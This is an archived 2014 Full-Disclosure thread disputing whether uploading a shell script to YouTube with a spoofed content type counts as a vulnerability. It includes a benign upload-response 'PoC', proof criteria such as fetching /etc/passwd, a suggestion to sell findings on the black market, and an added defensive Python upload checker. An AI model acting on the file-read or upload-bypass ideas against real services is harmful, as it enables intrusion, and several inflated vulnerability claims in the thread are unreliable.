Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
Please stop changing hats, it's embarrassing.

On Sat, Mar 15, 2014 at 7:36 PM, T Imbrahim timbra...@techemail.com wrote:
> Is this treated with the same way that says that Remote File Inclusion is not a security issue? You don't follow? Implying?
>
> I understand why nobody likes Google. If I've found a vulnerability and been treated like that for trying to help, I would rather sell it to the black market or to some government. The NSA maybe is happy to buy a RFI on Google, I'm sure they could make good use of that. Google is very deceptive in security matters.
>
> --- lcam...@coredump.cx wrote:
> From: Michal Zalewski lcam...@coredump.cx
> To: timbra...@techemail.com
> Cc: pr...@yahoo.co.uk, full-disclosure full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
> Date: Sat, 15 Mar 2014 10:59:40 -0700
>
>> A hacker exploits a JSON (javascript) object that has information of interest, for example holding some values for cookies. A lot of times that exploits the same policy origin. The JSON object returned from a server can be forged over writing javascript function that create the object. This happens because of the same origin policy problem in browsers that cannot say if js execution is different for two different sites.
>
> To be honest, I'm not sure I follow, but I'm fairly confident that my original point stands. If you believe that well-formed JSON objects without padding can be read across origins within the browser, I would love to see more information about that. (In this particular case, it still wouldn't matter because the response doesn't contain secrets, but it would certainly break a good chunk of the Internet.) JSONP is a different animal.
>
> /mz
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 
“There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
ROFL

On Mon, Mar 17, 2014 at 11:07 AM, T Imbrahim timbra...@techemail.com wrote:
> What drugs are you on, Pedro Ribeiro, I wonder...? I express my views; if you don't like them, don't watch them. Your responses so far have only been assy speculations, so don't tell me I'm wrong, and please don't say things like that. I don't know who the other people are, but what is true in security I support. Why would you Google my name...? Is the English language causing you ill effects?
>
> --- ped...@gmail.com wrote:
> From: Pedro Ribeiro ped...@gmail.com
> To: timbra...@techemail.com
> Cc: full-disclosure@lists.grok.org.uk, Michal Zalewski lcam...@coredump.cx, mvi...@gmail.com, gynv...@coldwind.pl
> Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
> Date: Mon, 17 Mar 2014 09:24:08 +
>
>> On 16 Mar 2014 23:36, T Imbrahim timbra...@techemail.com wrote:
>>> The thread read "Google vulnerabilities with PoC". From my understanding it was a RFI vulnerability on YouTube, and I voiced my support that this is a vulnerability. I also explained a JSON Hijacking case as a follow up, and you said you didn't follow. So I am just saying that treating security that way, there are other parties like NSA who welcome them happily.
>>
>> I think these guys - Alfred, Kirschbaum and Imbrahim - are the OP's sock puppets. They are all first-time posters from unusual free email providers jumping to defend the OP out of nowhere. If you search Google for their emails you only find references to this thread. They present similar (false and/or incorrect) arguments, talk about their extensive work experience, bash Google and its security team and send repeated emails with exactly the same text.
>>
>> This is turning into a madhouse... I hope this guy doesn't have access to a gun.
>>
>> Regards
>> Pedro
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
On Mon, Mar 17, 2014 at 2:25 PM, T Imbrahim timbra...@techemail.com wrote:
> I definitely would patch my computer if I discovered that somebody could upload files to my computer, even though they couldn't 'probe' them.

1) I don't think you understood the meaning of the word "probe" in this context, Nikolas.
2) Does that mean you believe Dropbox is vulnerable to remote file upload too?
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
On Mon, Mar 17, 2014 at 3:11 PM, Ulisses Montenegro ulisses.montene...@gmail.com wrote:
> Should YouTube restrict file uploads to known valid mime types? Sure, but that's only how you got the data in there to begin with. It's what happens after the data is in that will make all the difference. At this point I'm not even sure the data isn't being restricted - it just may be that the data type is checked again after it gets pulled out of the queue for processing, and if it's not a video it gets discarded.
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
On Sat, Mar 15, 2014 at 5:43 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote:
> People who do not have the facts have been trying to attack the arguer, on the basis of their personal beliefs.

Wow. I seriously can't tell if you're trolling or unbelievably narcissistic.

Your work has serious flaws, and they have been pointed out with facts over and over - but you think they're ad-hominem attacks based on the tone of the replies. Zalewski here is just trying to be nice and patient with you - but you somehow seem to believe he agrees with you based on the tone of his replies.

You're either faking it and pulling a massive prank on all of us, or you're so self-absorbed you can't get past your own emotional responses to people pointing out your mistakes. The actual contents of what they tell you are irrelevant to you, all that matters is if people praise or criticize you.

I'm beginning to think you may have issues and we should all back off for a while.
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
That is not what this email says. You can't reply "correct" to criticism and pretend it's praise.

On Sat, Mar 15, 2014 at 6:11 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote:
> Correct. The mime type can be circumvented. We can confirm this to be a valid vulnerability.
>
> For the PoC's: http://news.softpedia.com/news/Expert-Finds-File-Upload-Vulnerability-in-YouTube-Google-Denies-It-s-a-Security-Issue-431489.shtml
>
> On Fri, Mar 14, 2014 at 8:40 PM, Krzysztof Kotowicz kkotowicz...@gmail.com wrote:
>> 2014-03-14 20:28 GMT+01:00 Nicholas Lemonias. lem.niko...@googlemail.com:
>>> Then that also means that firewalls and IPS systems are worthless. Why spend so much time protecting the network layers if a user can send any file of choice to a remote network through http...
>>
>> No, they are not worthless per se, but of course for a user content publishing service they need to allow file upload over HTTP/s. How far those files are inspected and later processed is another question - and that could lead to a vulnerability that you DIDN'T demonstrate. You just uploaded a .sh file. There's no harm in that as nowhere did you prove that that file is being executed. Similarly (and that has been pointed out in this thread) you could upload a PHP-GIF polyglot file to a J2EE application - no vulnerability in this.
>>
>> Prove something by overwriting a crucial file, tricking another user's browser to execute the file as HTML from an interesting domain (XSS), popping a shell, triggering XXE when the file is processed as XML, anything. Then that is a vulnerability. So far - sorry, it is not, and you've been told it repeatedly.
>>
>>> As for the uploaded files being persistent, there is evidence of that. For instance a remote admin could be tricked to execute some of the uploaded files (Social Engineering).
>>
>> Come on, seriously? Social Engineering can make him download this file from pastebin just as well. That's a real stretch. IMHO it is not a security issue.
>>
>> You're uploading a file to some kind of processing queue that does not validate a file type, but nevertheless only processes those files as video - there is NO reason to suspect otherwise, and I'd like to be proven wrong here. Proven as in PoC.
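Kotowicz's and Montenegro's point in the two messages above (the upload is only how the data gets in; what the processing and download paths do with it decides whether anything is wrong) maps onto a two-stage check. The following is an added example written for this page, not code from the thread and not YouTube's code: the intake stage decides on the bytes rather than on the client-declared Content-Type and keeps a spoofed declaration as a detection signal, the processing stage re-checks before transcoding and discards anything that is not a recognised video container, and the download path serves stored bytes with headers that stop a browser from treating them as HTML in the site's origin. The accepted container list, the helper names and the sample uploads are assumptions constructed for the example.

```python
"""
Two-stage handling of user uploads (added example, not code from the thread).

The client-supplied Content-Type is untrusted input, just like the file name,
so the intake stage records it but decides on the bytes, and the processing
stage re-checks before doing any work. The container list and the sample
uploads below are constructed assumptions for this example.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumption: the pipeline accepts only these three container formats.
ALLOWED_VIDEO = {"video/mp4", "video/webm", "video/x-msvideo"}


@dataclass
class Upload:
    name: str            # file name as sent by the client (untrusted)
    declared_type: str   # Content-Type as sent by the client (untrusted)
    data: bytes          # the uploaded bytes


def sniff_container(data: bytes) -> Optional[str]:
    """Identify the container from its leading bytes, ignoring the declared type.

    ISO BMFF (MP4 family) has a box of type 'ftyp' at offset 4, Matroska/WebM
    starts with the EBML magic 1A 45 DF A3, and AVI is a RIFF file whose form
    type at offset 8 is 'AVI '.
    """
    if len(data) >= 12 and data[4:8] == b"ftyp":
        return "video/mp4"
    if data[:4] == b"\x1a\x45\xdf\xa3":
        return "video/webm"
    if data[:4] == b"RIFF" and data[8:12] == b"AVI ":
        return "video/x-msvideo"
    return None


def intake_check(upload: Upload) -> Dict[str, object]:
    """Intake stage: accept only recognised video, and flag a spoofed declaration.

    'spoofed_type' is true when the client claimed an accepted video type but the
    bytes are something else. That is the event worth logging and counting per
    account; by itself it is a mislabelled upload, not an exploit.
    """
    sniffed = sniff_container(upload.data)
    claimed_video = upload.declared_type in ALLOWED_VIDEO
    return {
        "name": upload.name,
        "declared": upload.declared_type,
        "sniffed": sniffed,
        "spoofed_type": claimed_video and sniffed != upload.declared_type,
        "accepted": sniffed in ALLOWED_VIDEO,
    }


def process_queue(queue: List[Upload]) -> Tuple[List[str], List[str]]:
    """Processing stage: re-check every item and transcode only real video.

    The re-check is deliberate: the queue may be fed by an older or more
    permissive front end, so this stage cannot rely on intake's verdict.
    """
    transcoded, discarded = [], []
    for upload in queue:
        if sniff_container(upload.data) in ALLOWED_VIDEO:
            transcoded.append(upload.name)
        else:
            discarded.append(upload.name)
    return transcoded, discarded


def download_headers(sniffed: Optional[str]) -> Dict[str, str]:
    """Headers for serving a stored file back.

    The type comes from the sniffed container (never from the client), the
    browser is told not to second-guess it, and the file is offered as a
    download, so whatever survived intake is not rendered as HTML or script
    in the serving origin.
    """
    return {
        "Content-Type": sniffed or "application/octet-stream",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment",
    }


# Constructed sample uploads (not real traffic).
MP4_CLIP = Upload("clip.mp4", "video/mp4",
                  b"\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom" + b"\x00" * 64)
SCRIPT_HONEST = Upload("file", "text/x-sh", b"#!/bin/sh\necho hello\n")
SCRIPT_SPOOFED = Upload("notes.mp4", "video/mp4", b"#!/bin/sh\necho hello\n")
GIF_MISLABELED = Upload("movie.mp4", "video/mp4", b"GIF89a" + b"\x00" * 32)

if __name__ == "__main__":
    queue = [MP4_CLIP, SCRIPT_HONEST, SCRIPT_SPOOFED, GIF_MISLABELED]
    for item in queue:
        print(intake_check(item))
    print(process_queue(queue))
    print(download_headers(sniff_container(SCRIPT_SPOOFED.data)))
```

Run as a script it prints the intake verdicts for the four constructed uploads, the transcode/discard split, and the headers the spoofed script would be served with. The honest `text/x-sh` upload is rejected but not flagged as spoofed, while the two files that claim `video/mp4` without being MP4 are the ones a defender would want to see in the logs.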
Re: [Full-disclosure] Google vulnerabilities with PoC
I believe Zalewski has explained very well why it isn't a vulnerability, and you couldn't possibly be calling him hostile. :)

On Sat, Mar 15, 2014 at 11:20 AM, M Kirschbaum pr...@yahoo.co.uk wrote:
> I have been watching this thread for a while and I think some people are being hostile here. There is nothing to gain being on either side but for the sake of security.
>
> As a penetration tester, writer, and malware analyst with a long and rewarding career... it would be absurd to admit that this is not a vulnerability. If the content-type fields can be altered and the API accepts it, that is undoubtedly a vulnerability; I believe that it shouldn't be there. It would be a shame to say that this is not a security problem.
>
> I have seen different responses on this thread but having seen the proof of concept images as well I just think that some of the people commenting here are just being hostile. It doesn't take much for somebody in the field to see clearly that Google does not want to pay. And I bet any amount of money that the bug bounty program is a way for filing potential threats by name and bank details.
>
> Rgds,
> M. Kirschbaum
Re: [Full-disclosure] Google vulnerabilities with PoC
Thank you. :)

On Sat, Mar 15, 2014 at 1:45 PM, Gynvael Coldwind gynv...@coldwind.pl wrote:
> Hey,
>
> I think the discussion digressed a little from the topic. Let's try to steer it back on it.
>
> What would make this a security vulnerability is one of the three standard outcomes:
> - information leak - i.e. leaking sensitive information that you normally do not have access to
> - remote code execution - in this case it would be:
> -- XSS - i.e. executing attacker provided JS/etc code in another user's browser, in the context *of a sensitive, non-sandboxed* domain (e.g. youtube.com)
> -- server-side code execution - i.e. executing attacker provided code on the youtube servers
> - denial of service - I think we all agree this bug doesn't increase the chance of a DoS; since you upload files that fail to be processed (so the CPU-consuming re-encoding is never run) I would argue that this decreases the chance of DoS if anything
>
> Which leaves us with the aforementioned RCE. I think we all agree that if Mr. Lemonias presents a PoC that uses the functionality he discovered to, either:
> (A) display a standard XSS alert(document.domain) in a sensitive domain (i.e. *.youtube.com or *.google.com, etc) for a different (test) user
> OR
> (B) execute code to fetch the standard /etc/passwd file from the youtube server and send it to him,
> then we will be convinced that this is a vulnerability and will be satisfied by the presented proof.
>
> I think that further discussion without this proof is not leading anywhere.
>
> One more note - in the discussion I noticed some arguments were tried to be justified or backed by saying "I am this, this and that, and have this many years of experience", e.g. (the first one I could find): "have worked for Lumension as a security consultant for more than a decade". Please note that neither experience nor job title proves exploitability of a *potential* bug. Working exploits do.
>
> That's it from me. I'm looking forward to seeing the RCE exploits (be it client or server side).
>
> Kind regards,
> Gynvael Coldwind
Re: [Full-disclosure] Google vulnerabilities with PoC
Sockpuppet much?

On Sat, Mar 15, 2014 at 2:35 PM, M Kirschbaum pr...@yahoo.co.uk wrote:
> Gynvael Coldwind,
>
> What Alfred has reiterated is that this is a security vulnerability irrespective of whether it qualifies for credit. It is an unusual one, but still a security vulnerability. Anyone who says otherwise is blind, has little or no experience in hands-on security, or else has a different agenda.
>
> The obvious here is that Google dismissed it as a non-security issue, which I find rather sad and somewhat ridiculous. Even if we asked Andrew Tanenbaum about it, I suspect his answers wouldn't be much different.
>
> Rgds,
>
> On Saturday, 15 March 2014, 12:45, Gynvael Coldwind gynv...@coldwind.pl wrote:
>> [...]
Re: [Full-disclosure] [SPAM] [Bayesian][bayesTestMode] Re: Google vulnerabilities with PoC
You must be new.

On Sat, Mar 15, 2014 at 3:43 PM, Thomas Williams tho...@trwilliams.me.uk wrote:
> I signed onto this mailing list as an interested person in security - not to see everyone moan. We will all have differences in opinion and we should all respect that. This goes for everyone, and I feel I speak for a lot of people here: everyone needs to grow up, and shut up.
>
> On 15 Mar 2014, at 13:43, Mario Vilas mvi...@gmail.com wrote:
>> Sockpuppet much?
>>
>> On Sat, Mar 15, 2014 at 2:35 PM, M Kirschbaum pr...@yahoo.co.uk wrote:
>>> [...]
Re: [Full-disclosure] Google vulnerabilities with PoC
On Thu, Mar 13, 2014 at 10:30 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote:
> We confirm this to be a valid vulnerability for the following reasons. The access control subsystem is defeated, resulting in arbitrary write access of any file of choice.
>
> 1. You Tube defines which file types are permitted to be uploaded.

And...?

> 2. Exploitation is achieved by circumvention of web-based security controls (namely http forms, which is a weak security measure). However, exploitation of the issue results in unrestricted file uploads (any file of choice). Remote code execution may be possible either through social engineering, or by stochastically rewriting an existing file-structure in the CDN.

So in other words, you haven't proven it. The upload in itself is not a vulnerability (and if you understood that it is, please read again that OWASP document).

> 3. This directly impacts the integrity of the service since modification of information occurs by circumvention. Renaming the uploaded files can be achieved through YouTube's inherent video manager.

How does it impact the integrity? Again, unexpected functionality does not necessarily equal exploitation.

> 4. Denial of Service attacks are feasible since we bypass all security restrictions. This directly impacts the availability of the service.

Not proven either. At this point I feel you're just making stuff up. All you did was upload stuff you can't download afterwards.

> 5. Malware propagation is possible, if the planted code gets executed through social engineering or by re-writing a valid file system structure.

Again, you need to be able to download the stuff you uploaded, and have it executed directly. Otherwise you could do the same thing more efficiently with Google Drive.

> 6. All uploaded files can be downloaded through Google Take Out, if past the Content ID filtering algorithm (through file header obfuscation and encryption).

You need to explain how that is an attack vector.

> Best Regards,
> Nicholas Lemonias
> Advanced Information Security Corp.
Re: [Full-disclosure] Google vulnerabilities with PoC
You're still missing the attack vector (and the point of the discussion too, but that's painfully obvious).

On Fri, Mar 14, 2014 at 4:21 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote:
> Here's my evidence.
>
> Live Proof Of Concept
> ==
> http://upload.youtube.com/?authuser=0&upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw&origin=CiNodHRwOi8vd3d3LnlvdXR1YmUuY29tL3VwbG9hZC9ydXBpbxINdmlkZW8tdXBsb2Fkcw
>
> {
>   "sessionStatus": {
>     "state": "FINALIZED",
>     "externalFieldTransfers": [
>       {
>         "name": "file",
>         "status": "COMPLETED",
>         "bytesTransferred": 113,
>         "bytesTotal": 113,
>         "formPostInfo": {
>           "url": "http://www.youtube.com/upload/rupio?authuser=0\u0026upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw\u0026file_id=000",
>           "cross_domain_url": "http://upload.youtube.com/?authuser=0\u0026upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw\u0026origin=CiNodHRwOi8vd3d3LnlvdXR1YmUuY29tL3VwbG9hZC9ydXBpbxINdmlkZW8tdXBsb2Fkcw"
>         },
>         "content_type": "text/x-sh"
>       }
>     ],
>     "additionalInfo": {
>       "uploader_service.GoogleRupioAdditionalInfo": {
>         "completionInfo": {
>           "status": "SUCCESS",
>           "customerSpecificInfo": {
>             "status": "ok",
>             "video_id": "KzKDtijwHFI",
>             "upload_id": "AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw"
>           }
>         }
>       }
>     }
>   }
> }
>
> The above proof of concept demonstrates:
> 1. We have bypassed the security controls in YouTube and uploaded an unexpected file type.
> 2. The file is persistent and has not been deleted by YouTube.
> 3. It can be queried for information since it is assigned a unique upload_id.
> 4. It's successfully uploaded to youtube.com. As you can see it gives out the total bytes written to the remote network.
> 5. "content_type": "text/x-sh" --- The file is a shell script named 'file'.
> 6. It can be enumerated by a non-authenticated user, remotely.
>
> On Fri, Mar 14, 2014 at 2:40 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote:
>> Are you a Google employee... I wonder?
>>
>> There is nothing else to be said regarding this. Our research for remote code execution continues and we will let you and Google know once that is confirmed, through the coordinated security program.
>>
>> And please, OWASP is recognised worldwide.
>>
>> Best Regards,
>> Nicholas Lemonias
>>
>> On Thu, Mar 13, 2014 at 11:06 PM, Julius Kivimäki julius.kivim...@gmail.com wrote:
>>> Look, you keep calling it a vulnerability with 0 evidence that it's even exploitable. Until you can prove otherwise this is like speculating the potential security repercussions of uploading files to EC2 (which would probably have potential to be much more severe than what you're discussing here since javascript uploaded to ec2 could actually get executed by someone's browser). You keep throwing around keywords like OWASP, OSI, security best practices as if they actually make a difference here. Truth is there's no reason to believe that what you have discovered here is exploitable. This mostly seems like a desperate attempt of getting money off of google and your name in some publication shitty enough to not do any fact checking (eg. softpedia).
>>>
>>> 2014-03-13 21:48 GMT+02:00 Nicholas Lemonias. lem.niko...@googlemail.com:
>>>> Julius Kivimaki, your disbelief in OWASP, CEH, Journalists and anything you may, or may not be qualified to question amazes. But everyone's opinion is of course respected.
>>>>
>>>> I normally don't provide security lessons via e-mail and full-disclosure, however you seem not to understand the security report fully and some core principles. If you can't see what information security best practises, the OSI/network model and self-automata propagation have anything to do with arbitrary write permissions to a remote network leveraging from the application layer, then me and you have nothing to talk about.
>>>>
>>>> As for the exploitability of this vulnerability, you will never know until you try. And we have tried it, and seem to know better. I suggest you read the report again.
>>>>
>>>> Thank you.
>>>>
>>>> -- Forwarded message --
>>>> From: Nicholas Lemonias. lem.niko...@googlemail.com
>>>> Date: Thu, Mar 13, 2014 at 7:47 PM
>>>> Subject: Re: [Full-disclosure] Google vulnerabilities with PoC
>>>> To: Julius Kivimäki julius.kivim...@gmail.com
>>>>
>>>> [...]
Re: [Full-disclosure] Google vulnerabilities with PoC
But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. However successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.comwrote: Hi I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis So I would probably have reported this Finding as a Weakness (and not Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. 
see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB: A simple Threat Model (i.e. list of CAPEC) would be a solid support to your report This would help to evaluate/measure the risk (e.g. CVSS). Helping the decision/actions around this risk PS: interestingly, in this case, I'm not sure that the Separation of Duties security principle was applied correctly by Google in term of Risk Acceptance (which could be another Finding) So in few words, be careful with the terminology. (don't always say vulnerability like the media say hacker, see RFC1392) Use a CWE ID (e.g. CWE-434, CWE-183, CWE-184 vs. CWE-616) My 2 bitcents Sorry if it is not edible :) Happy Hacking! /JA https://github.com/athiasjerome/XORCISM 2014-03-14 7:19 GMT+03:00 Michal Zalewski lcam...@coredump.cx: Nicholas, I remember my early years in the infosec community - and sadly, so do some of the more seasoned readers of this list :-) Back then, I thought that the only thing that mattered is the ability to find bugs. But after some 18 years in the industry, I now know that there's an even more important and elusive skill. That skill boils down to having a robust mental model of what constitutes a security flaw - and being able to explain your thinking to others in a precise and internally consistent manner that convinces others to act. We need this because the security of a system can't be usefully described using abstract terms: even the academic definitions ultimately boil down to saying the system is secure if it doesn't do the things we *really* don't want it to do. 
In this spirit, the term vulnerability is generally reserved for behaviors that meet all of the following criteria: 1) The behavior must have negative consequences for at least one of the legitimate stakeholders (users, service owners, etc), 2) The consequences must be widely seen as unexpected and unacceptable, 3) There must be a realistic chance of such a negative outcome, 4) The behavior must introduce substantial new risks that go beyond the previously accepted trade-offs. If we don't have that, we usually don't have a case, no matter how clever the bug is. Cheers (and happy hunting!), /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the
Re: [Full-disclosure] Google vulnerabilities with PoC
On Fri, Mar 14, 2014 at 12:38 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Jerome of Mcafee has made a very valid point on revisiting separation of duties in this security instance. Happy to see more professionals with some skills. Some others have also mentioned the feasibility for Denial of Service attacks. Remote code execution by Social Engineering is also a prominent scenario. Actually, people have been pointing out exactly the opposite. But if you insist on believing you can DoS an EC2 by uploading files, good luck to you then... If you can't tell that that is a vulnerability (probably coming from a bunch of CEH's), I feel sorry for those consultants. You're the only one throwing around certifications here. I can no longer tell if you're being serious or this is a massive prank. Nicholas. On Fri, Mar 14, 2014 at 10:45 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We are on a different level perhaps. We do certainly disagree on those points. I wouldn't hire you as a consultant, if you can't tell if that is a valid vulnerability.. Best Regards, Nicholas Lemonias. On Fri, Mar 14, 2014 at 10:10 AM, Mario Vilas mvi...@gmail.com wrote: But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. 
However, successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.com wrote: Hi, I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis. So I would probably have reported this Finding as a Weakness (and not Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB: A simple Threat Model (i.e. list of CAPEC) would be a solid support to your report. This would help to evaluate/measure the risk (e.g. CVSS), helping the decision/actions around this risk. PS: interestingly, in this case, I'm not sure that the Separation of Duties security principle was applied correctly by Google in terms of Risk Acceptance (which could be another Finding). So in a few words, be careful with the terminology. (don't always say vulnerability like the media say hacker, see RFC1392) Use a CWE ID (e.g. CWE-434, CWE-183, CWE-184 vs. 
CWE-616) My 2 bitcents Sorry if it is not edible :) Happy Hacking! /JA https://github.com/athiasjerome/XORCISM 2014-03-14 7:19 GMT+03:00 Michal Zalewski lcam...@coredump.cx: Nicholas, I remember my early years in the infosec community - and sadly, so do some of the more seasoned readers of this list :-) Back then, I thought that the only thing that mattered is the ability to find bugs. But after some 18 years in the industry, I now know that there's an even more important and elusive skill. That skill boils down to having a robust mental model of what constitutes a security flaw - and being able to explain your thinking to others in a precise and internally consistent manner that convinces others to act. We need this because the security of a system can't be usefully described using abstract terms: even the academic definitions ultimately boil down to saying the system is secure if it doesn't do
Re: [Full-disclosure] Google vulnerabilities with PoC
LOL, thanks for the undeserved praise! xD On Fri, Mar 14, 2014 at 2:50 PM, Sergio 'shadown' Alvarez shad...@gmail.com wrote: Dear Nicholas Lemonias, I don't use to get in these scrappy discussions, but yeah you are in a completely different level if you compare yourself with Mario. You are definitely a Web app/metasploit-user guy and pick up a discussion with a binary and memory corruption ninja exploit writer like Mario. You should know your place and shut up. Period. Btw, if you dare discussing with a beast like lcamtuf, you are definitely out of your mind. Cheers, Sergio. -- Sergio On Mar 14, 2014, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We are on a different level perhaps. We do certainly disagree on those points. I wouldn't hire you as a consultant, if you can't tell if that is a valid vulnerability.. Best Regards, Nicholas Lemonias. On Fri, Mar 14, 2014 at 10:10 AM, Mario Vilas mvi...@gmail.com wrote: But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. However, successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. 
This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.com wrote: Hi, I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis. So I would probably have reported this Finding as a Weakness (and not Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB: A simple Threat Model (i.e. list of CAPEC) would be a solid support to your report. This would help to evaluate/measure the risk (e.g. CVSS), helping the decision/actions around this risk. PS: interestingly, in this case, I'm not sure that the Separation of Duties security principle was applied correctly by Google in terms of Risk Acceptance (which could be another Finding). So in a few words, be careful with the terminology. (don't always say vulnerability like the media say hacker, see RFC1392) Use a CWE ID (e.g. CWE-434, CWE-183, CWE-184 vs. CWE-616) My 2 bitcents. Sorry if it is not edible :) Happy Hacking! 
